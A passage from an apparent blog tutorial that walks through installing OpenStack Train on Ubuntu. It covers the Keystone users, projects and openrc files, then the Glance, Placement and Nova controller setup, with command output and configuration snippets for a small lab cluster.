--bootstrap-public-url http://controller:5000/v3/ \
--bootstrap-region-id RegionOne
</code></pre></div></div>
<p>Most OpenStack services have three main endpoints, designed to be accessed by
users of differing permissions. The admin endpoint is intended for OpenStack
administrators, the internal endpoint is for service to service communication,
for example, between keystone and nova, and lastly, the public endpoint is for
anyone to query.</p>
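<p>Once we have admin credentials loaded (we set those up in the next section), the
catalogue entries this bootstrap created can be inspected with the standard
client command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint list --service keystone
</code></pre></div></div>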
<p>I used the password “openstack” here, and we will use it for front end OpenStack
services. You can use whatever you like, as long as you are consistent.</p>
<p>Just a few last things now. We need to add some configuration to apache:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/apache2/apache2.conf
ServerName controller
</code></pre></div></div>
<p>Save, and restart the apache service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart apache2
</code></pre></div></div>
<h3 id="creating-users-roles-and-projects-in-keystone">Creating Users, Roles and Projects in Keystone</h3>
<p>First up is creating a project. We need to set some environment variables to
feed into keystone, like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ export OS_USERNAME=admin
$ export OS_PASSWORD=openstack
$ export OS_PROJECT_NAME=admin
$ export OS_USER_DOMAIN_NAME=Default
$ export OS_PROJECT_DOMAIN_NAME=Default
$ export OS_AUTH_URL=http://controller:5000/v3
$ export OS_IDENTITY_API_VERSION=3
</code></pre></div></div>
<p>After that, we can go and create some projects:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack project create --domain default --description "Service Project" service
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Service Project |
| domain_id | default |
| enabled | True |
| id | c050173209284c80816cab4a42e829bb |
| is_domain | False |
| name | service |
| options | {} |
| parent_id | default |
| tags | [] |
+-------------+----------------------------------+
$ openstack project create --domain default --description "Demo Project" demo
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Demo Project |
| domain_id | default |
| enabled | True |
| id | 33569bb56110474db2d584b4a1936c6b |
| is_domain | False |
| name | demo |
| options | {} |
| parent_id | default |
| tags | [] |
+-------------+----------------------------------+
</code></pre></div></div>
<p>We should also make a user that is not an administrator, for using things
normally. We can make one like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt demo
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | bf0cfff44d3c49cb92d10e5977a9decc |
| name | demo |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role create user
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | None |
| domain_id | None |
| id | 591b3b65831847a5b7eb60e9bcef0f1c |
| name | user |
| options | {} |
+-------------+----------------------------------+
$ openstack role add --project demo --user demo user
</code></pre></div></div>
<p>We made a project called demo, created a role called user, and
granted our demo account the user role on the demo project.</p>
<h3 id="verifying-that-keystone-was-installed-correctly">Verifying that Keystone was Installed Correctly</h3>
<p>We can check that our users and projects were created properly. First, unset
the temporary environment variables we set earlier:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ unset OS_AUTH_URL OS_PASSWORD
</code></pre></div></div>
<p>From there, we can request a token for both of our users, admin and demo.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack --os-auth-url http://controller:5000/v3 \
--os-project-domain-name Default --os-user-domain-name Default \
--os-project-name admin --os-username admin token issue
Password:
+------------+-----------------------------------------------------------------+
| Field | Value |
+------------+-----------------------------------------------------------------+
| expires | 2020-01-27T03:23:56+0000 |
| id | gAAAAABeLkm86gLK4PJXGCrFytreNRz68VT_10sfa9aG8kBWhvWGFM36y9tSrBO |
| | 8-QagpervkRxePXB0ZgriZ4K7Lh5Ozoe2_JNj9wtlVs4VAfSyb66c35YOGIMaQs |
| | oKfBGEuYjrfG-22UbT9zWHUw3GoRx37_VBpr13inGQhIBm7HVE9AWv0KI |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| user_id | c23d6d5a0b8f4dae96f5156d62d62dbd |
+------------+-----------------------------------------------------------------+
</code></pre></div></div>
<p>And the demo user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack --os-auth-url http://controller:5000/v3 \
--os-project-domain-name Default --os-user-domain-name Default \
--os-project-name demo --os-username demo token issue
Password:
+------------+-----------------------------------------------------------------+
| Field | Value |
+------------+-----------------------------------------------------------------+
| expires | 2020-01-27T03:28:07+0000 |
| id | gAAAAABeLkq30a-m6Cpcv3U9tBpZyJia4dQXoUhV73QzW9kH08cGzhnIUvWeCv8 |
| | BE0Nag6Lb4DKgiWXtiSpzSyJaXARwJsWN8U1lHIUG8FA2nQHDHPeVBao8GJgSec |
| | n9thhc19CMPcK7UUZqlrMm84i8bC4baU08LsG7JvGZ4cPRoEiB-OZVgg |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| user_id | bf0cfff44d3c49cb92d10e5977a9decc |
+------------+-----------------------------------------------------------------+
</code></pre></div></div>
<p>To make it easier to deal with different users in our OpenStack cluster,
the convention is to save each user’s collection of environment variables into
a small shell script, which we can source whenever we want to act as that
user.</p>
<p>This is known as “OpenStack client environment scripts”, so let’s take a look.
Make two files, one called <code class="language-plaintext highlighter-rouge">admin-openrc</code> and the other <code class="language-plaintext highlighter-rouge">demo-openrc</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ vim admin-openrc
export OS_USERNAME=admin
export OS_PASSWORD=openstack
export OS_PROJECT_NAME=admin
export OS_USER_DOMAIN_NAME=Default
export OS_PROJECT_DOMAIN_NAME=Default
export OS_AUTH_URL=http://controller:5000/v3
export OS_IDENTITY_API_VERSION=3
export OS_IMAGE_API_VERSION=2
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ vim demo-openrc
export OS_USERNAME=demo
export OS_PASSWORD=openstack
export OS_PROJECT_NAME=demo
export OS_USER_DOMAIN_NAME=Default
export OS_PROJECT_DOMAIN_NAME=Default
export OS_AUTH_URL=http://controller:5000/v3
export OS_IDENTITY_API_VERSION=3
export OS_IMAGE_API_VERSION=2
</code></pre></div></div>
<p>Then if we want to change to the admin user, we can just source it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack token issue
+------------+-----------------------------------------------------------------+
| Field | Value |
+------------+-----------------------------------------------------------------+
| expires | 2020-01-27T03:44:52+0000 |
| id | gAAAAABeLk6k6b6CVGwnigP8DF6iZUieU1H_J_Sdhdr0KZaFN4OULhVndFvPt1N |
| | 5EAReAiAZl7Kmx_16KXkB3fQ4dFr_N5_id3UyEjcqWFsFp2kN5EjtA674ubG4CL |
| | 3auzXEvlrx5pmS0pl_hd0UQQGO7DfF3vHo-ksvcA9x7rETUS1UfWYXMXE |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| user_id | c23d6d5a0b8f4dae96f5156d62d62dbd |
+------------+-----------------------------------------------------------------+
</code></pre></div></div>
<p>That makes switching users pretty easy. Still, it leaves credentials lying
around in plaintext on your machines the whole time, which makes me uneasy. For
our toy cluster it doesn’t matter, but for bigger deployments it is concerning.</p>
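<p>If the plaintext openrc files bother you too, one small improvement is that
the OpenStack client can also read credentials from a
<code class="language-plaintext highlighter-rouge">clouds.yaml</code> file, which
at least keeps them in one well-known place with tight permissions. A minimal
sketch, mirroring our admin-openrc values:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir -p ~/.config/openstack
$ vim ~/.config/openstack/clouds.yaml
clouds:
  admin:
    auth:
      auth_url: http://controller:5000/v3
      username: admin
      password: openstack
      project_name: admin
      user_domain_name: Default
      project_domain_name: Default
    identity_api_version: 3
$ chmod 600 ~/.config/openstack/clouds.yaml
$ openstack --os-cloud admin token issue
</code></pre></div></div>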
<h2 id="installing-glance-the-image-service">Installing Glance, the Image Service</h2>
<p>Glance is the image service for OpenStack. It is in charge of discovering,
registering and retrieving virtual machine operating system images.</p>
<p>Glance also allows users to build their own images, and take snapshots.</p>
<p>I will be following the <a href="https://docs.openstack.org/glance/train/install/install-ubuntu.html">Glance Installation Documentation</a>.</p>
<h3 id="creating-the-glance-database">Creating the Glance Database</h3>
<p>Back to the controller node, since Glance will be installed there as well.</p>
<p>We need to create a database for Glance, so go ahead and open up the mysql
monitor, and issue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> create database glance;
Query OK, 1 row affected (0.000 sec)
</code></pre></div></div>
<p>From there, just like with Keystone, we need to make a user, and grant them
access to the glance database.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> grant all privileges on glance.* to 'glance'@'localhost' identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> grant all privileges on glance.* to 'glance'@'%' identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
</code></pre></div></div>
<p>Now we need to make the glance user in OpenStack. To do this, we need to become
the <code class="language-plaintext highlighter-rouge">admin</code> user, so source the <code class="language-plaintext highlighter-rouge">admin-openrc</code> file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt glance
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | 7238c0c8862d4a63b95143e6a42d683b |
| name | glance |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
</code></pre></div></div>
<p>Next, we need to give the glance user the admin role on the service project:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack role add --project service --user glance admin
</code></pre></div></div>
<p>Now we need to define the service to add, and set up the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name glance --description "OpenStack Image" image
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Image |
| enabled | True |
| id | 062afb3d1c4345c89d808548c2ec53f9 |
| name | glance |
| type | image |
+-------------+----------------------------------+
</code></pre></div></div>
<p>We can set up our endpoints with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne image public http://controller:9292
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 31b50e9589e74c9b839091f3a5e41688 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance |
| service_type | image |
| url | http://controller:9292 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne image internal http://controller:9292
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | ba685939d6344808828a6cb6a5426dee |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance |
| service_type | image |
| url | http://controller:9292 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne image admin http://controller:9292
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 53dcf790c16d4275a1ddf52556eccbed |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance |
| service_type | image |
| url | http://controller:9292 |
+--------------+----------------------------------+
</code></pre></div></div>
<p>From the URL, we can see that glance listens on port <code class="language-plaintext highlighter-rouge">9292</code>.</p>
<p>Now that the endpoint is created, we can install the glance package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install glance
</code></pre></div></div>
<p>Just like with Keystone, we need to edit the API configuration file to enter
the credentials glance will use to access its database.</p>
<p>Mine already has sqlite configured, so comment it out and add:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/glance/glance-api.conf
[database]
#connection = sqlite:////var/lib/glance/glance.sqlite
#backend = sqlalchemy
connection = mysql+pymysql://glance:password123@controller/glance
</code></pre></div></div>
<p>Next, we need to modify the <code class="language-plaintext highlighter-rouge">[keystone_authtoken]</code> sections:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = glance
password = openstack
</code></pre></div></div>
<p>A small edit for <code class="language-plaintext highlighter-rouge">[paste_deploy]</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[paste_deploy]
flavor = keystone
</code></pre></div></div>
<p>Another edit for <code class="language-plaintext highlighter-rouge">[glance_store]</code> to say we will use the file system to store
our images:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[glance_store]
stores = file,http
default_store = file
filesystem_store_datadir = /var/lib/glance/images/
</code></pre></div></div>
<p>Finally, save and exit your editor.</p>
<p>We can populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "glance-manage db_sync" glance
</code></pre></div></div>
<p>There is going to be a lot of scary output, but you can ignore it. It is
mostly statements saying that each database migration from older glance
versions completed successfully.</p>
<p>From there, we can restart the glance service to reload the config:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart glance-api
</code></pre></div></div>
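<p>Before moving on, it doesn’t hurt to confirm the API actually came back up
and is listening on port 9292. This is just a sanity check, not a required
step:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo ss -tlnp | grep 9292
</code></pre></div></div>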
<h3 id="verifying-that-glance-was-installed-correctly">Verifying that Glance was Installed Correctly</h3>
<p>All the OpenStack tutorials seem to use <a href="http://launchpad.net/cirros">Cirros</a>
in their deployments, so we will go see what all the fuss is about.</p>
<p>Source the admin creds since we will need administrative permissions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
</code></pre></div></div>
<p>Download the disk image:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget http://download.cirros-cloud.net/0.4.0/cirros-0.4.0-x86_64-disk.img
</code></pre></div></div>
<p>Woah! It’s only 12.13 megabytes! That’s crazy! Maybe it’s popular because
it’s small.</p>
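<p>If you are curious about what we just downloaded,
<code class="language-plaintext highlighter-rouge">qemu-img</code> can inspect
it (assuming the qemu-utils package is installed). It should report a qcow2
image, which matches the disk format we pass to glance below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ qemu-img info cirros-0.4.0-x86_64-disk.img
</code></pre></div></div>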
<p>We can upload the image to glance with the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack image create --file cirros-0.4.0-x86_64-disk.img --disk-format \
qcow2 --container-format bare --public cirros
+------------------+------------------------------------------------------+
| Field | Value |
+------------------+------------------------------------------------------+
| checksum | 443b7623e27ecf03dc9e01ee93f67afe |
| container_format | bare |
| created_at | 2020-01-27T04:17:35Z |
| disk_format | qcow2 |
| file | /v2/images/5ad293f2-1d07-44ae-8a23-19d619885a3b/file |
| id | 5ad293f2-1d07-44ae-8a23-19d619885a3b |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros |
| owner | a45f9c52c6964c5da7585f5c8a70fdc7 |
| properties | os_hash_algo='sha512', os_hash_value='6513f21e44aa3d |
| | a349f248188a44bc304a3653a04122d8fb4535423c8e1d14cd6a |
| | 153f735bb0982e2161b5b5186106570c17a9e58b64dd39390617 |
| | cd5a350f78', os_hidden='False' |
| protected | False |
| schema | /v2/schemas/image |
| size | 12716032 |
| status | active |
| tags | |
| updated_at | 2020-01-27T04:17:36Z |
| virtual_size | None |
| visibility | public |
+------------------+------------------------------------------------------+
</code></pre></div></div>
<p>We can check to see if it was imported correctly with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack image list
+--------------------------------------+--------+--------+
| ID | Name | Status |
+--------------------------------------+--------+--------+
| 5ad293f2-1d07-44ae-8a23-19d619885a3b | cirros | active |
+--------------------------------------+--------+--------+
</code></pre></div></div>
<p>That’s it! We have Glance installed and configured now.</p>
<h2 id="installing-placement-the-resource-tracking-service">Installing Placement, the Resource Tracking Service</h2>
<p>Placement lets OpenStack services track inventories of resources and how much
of each resource is left to consume. You can also set traits on those
resources, such as whether a machine has an SSD, or an SR-IOV capable NIC, for
example.</p>
<p>Placement used to be a part of Nova, but it was split out in the Stein release,
so we need to go ahead and install it before we can install Nova.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/placement/train/install/install-ubuntu.html">Placement Install Documentation</a>.</p>
<h3 id="setting-up-the-database-on-the-controller">Setting Up the Database On the Controller</h3>
<p>Placement has its own database, so let’s go ahead and make one:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE placement;
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON placement.* TO 'placement'@'localhost' \
IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON placement.* TO 'placement'@'%' \
IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.000 sec)
</code></pre></div></div>
<h3 id="creating-a-user-and-the-endpoints">Creating a User and the Endpoints</h3>
<p>Let’s make a user for placement and add it to the admin role:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt placement
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | aca47b0613d443118363f40e59b4870d |
| name | placement |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user placement admin
</code></pre></div></div>
<p>We can then create the Placement service and set up its endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name placement --description "Placement API" placement
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Placement API |
| enabled | True |
| id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| name | placement |
| type | placement |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Making the public, internal and admin endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne placement public http://controller:8778
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | b018157a7c2b46da8aa8d99d2477cc54 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement |
| service_type | placement |
| url | http://controller:8778 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne placement internal http://controller:8778
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 4aa4ff0b45fc48ae8f456fcf40ed7e8e |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement |
| service_type | placement |
| url | http://controller:8778 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne placement admin http://controller:8778
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | d475a4976eb34f6d9619dc72e4591736 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement |
| service_type | placement |
| url | http://controller:8778 |
+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-and-configuring-the-placement-packages">Installing and Configuring the Placement Packages</h3>
<p>We can install placement with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install placement-api
</code></pre></div></div>
<p>From there, we can enable access to its database by editing its configuration
file. Comment out the sqlite connection and add our mysql connection:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/placement/placement.conf
[placement_database]
#connection = sqlite:////var/lib/placement/placement.sqlite
connection = mysql+pymysql://placement:password123@controller/placement
</code></pre></div></div>
<p>Next head to the <code class="language-plaintext highlighter-rouge">[api]</code> and <code class="language-plaintext highlighter-rouge">[keystone_authtoken]</code> sections and add the
following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[api]
auth_strategy = keystone
[keystone_authtoken]
auth_url = http://controller:5000/v3
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = placement
password = openstack
</code></pre></div></div>
<p>Note the password is the same as the one you used when you created the placement
user earlier.</p>
<p>From there, we can populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "placement-manage db sync" placement
# exit
$ sudo systemctl restart apache2
</code></pre></div></div>
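<p>As a quick smoke test, the Placement API root returns a small JSON version
document without needing authentication, so a plain curl should come back with
JSON rather than an error page:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl http://controller:8778
</code></pre></div></div>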
<h3 id="verify-that-placement-works">Verify that Placement Works</h3>
<p>The osc-placement plugin allows us to query the placement API for its internal
data, so let’s install it and give it a go:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install python3-osc-placement
</code></pre></div></div>
<p>Once that is done, we can query the placement API with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack --os-placement-api-version 1.2 resource class list --sort-column name
+----------------------------+
| name |
+----------------------------+
| DISK_GB |
| FPGA |
| IPV4_ADDRESS |
| MEMORY_MB |
| MEM_ENCRYPTION_CONTEXT |
| NET_BW_EGR_KILOBIT_PER_SEC |
| NET_BW_IGR_KILOBIT_PER_SEC |
| NUMA_CORE |
| NUMA_MEMORY_MB |
| NUMA_SOCKET |
| NUMA_THREAD |
| PCI_DEVICE |
| PCPU |
| PGPU |
| SRIOV_NET_VF |
| VCPU |
| VGPU |
| VGPU_DISPLAY_HEAD |
+----------------------------+
</code></pre></div></div>
<p>It seems like it is working. Great!</p>
<h2 id="installing-nova-the-compute-service">Installing Nova, the Compute Service</h2>
<p>Nova is the compute service for OpenStack. It is responsible for taking requests
to provision a virtual machine, deciding on what compute host the instance will
be launched by looking at resources available in the pool, and interacting with
the underlying hypervisor to create and manage the virtual machine.</p>
<p>Nova supports many different hypervisors, and in this deployment, we will have
a single compute node which uses QEMU / KVM.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/nova/train/install/controller-install-ubuntu.html">Nova Controller Install Documentation</a>.</p>
<h3 id="setting-up-the-databases-services-and-endpoints-for-nova">Setting up the Databases, Services and Endpoints for Nova</h3>
<p>We need to configure Nova services on the controller and the compute node, so we
will begin by setting up some databases.</p>
<p>On the controller, open up the <code class="language-plaintext highlighter-rouge">mysql monitor</code>, and make databases for nova_api,
nova and nova_cell0.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE nova_api;
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> CREATE DATABASE nova;
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]> CREATE DATABASE nova_cell0;
Query OK, 1 row affected (0.000 sec)
</code></pre></div></div>
<p>As usual, we also need to grant some privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'localhost' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'%' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova.* TO 'nova'@'localhost' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova.* TO 'nova'@'%' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'localhost' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'%' \
IDENTIFIED BY 'password123';
</code></pre></div></div>
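<p>If you want to be sure all those grants took, MariaDB can read them back to
you. A quick check, while still in the mysql monitor:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> SHOW GRANTS FOR 'nova'@'localhost';
MariaDB [(none)]> SHOW GRANTS FOR 'nova'@'%';
</code></pre></div></div>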
<p>Next, we need to create a nova user and add it to the admin role:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt nova
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | d6f43252051e43fe9cf7dbcc9b538751 |
| name | nova |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user nova admin
</code></pre></div></div>
<p>From there we need to create the Nova service, and set up its endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name nova --description "OpenStack Compute" compute
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Compute |
| enabled | True |
| id | 2364a25accfc4f8e9925009b152262f9 |
| name | nova |
| type | compute |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Public, internal and admin endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne compute public http://controller:8774/v2.1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | ed31df66c2ce45c981070395bf32eed4 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova |
| service_type | compute |
| url | http://controller:8774/v2.1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne compute internal http://controller:8774/v2.1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 2429b84a9157442688867c80863373f9 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova |
| service_type | compute |
| url | http://controller:8774/v2.1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne compute admin http://controller:8774/v2.1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 27d6020c0c49436480febef5273a5b37 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova |
| service_type | compute |
| url | http://controller:8774/v2.1 |
+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-nova-on-the-controller">Installing Nova on the Controller</h3>
<p>Time to actually get some packages installed to the controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install nova-api nova-conductor nova-novncproxy nova-scheduler
</code></pre></div></div>
<p>From there, we will need to edit the configuration file and add database creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[api_database]
#connection = sqlite:////var/lib/nova/nova_api.sqlite
connection = mysql+pymysql://nova:password123@controller/nova_api
[database]
#connection = sqlite:////var/lib/nova/nova.sqlite
connection = mysql+pymysql://nova:password123@controller/nova
</code></pre></div></div>
<p>Then in the <code class="language-plaintext highlighter-rouge">[DEFAULT]</code> section, add:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller:5672/
my_ip = 10.0.0.11
use_neutron = true
firewall_driver = nova.virt.firewall.NoopFirewallDriver
</code></pre></div></div>
<p>This sets RabbitMQ as our message queue, and enables Neutron for networking.</p>
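<p>If you want to confirm the rabbitmq side of that
<code class="language-plaintext highlighter-rouge">transport_url</code> is
healthy, rabbitmqctl can list the users and their permissions. This assumes
the openstack rabbitmq user was created earlier in this guide:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo rabbitmqctl list_users
$ sudo rabbitmqctl list_permissions
</code></pre></div></div>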
<p>Let’s set up Keystone authentication now:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[api]
auth_strategy = keystone
[keystone_authtoken]
www_authenticate_uri = http://controller:5000/
auth_url = http://controller:5000/
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = nova
password = openstack
</code></pre></div></div>
<p>While we are at it, set up Placement authentication:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[placement]
region_name = RegionOne
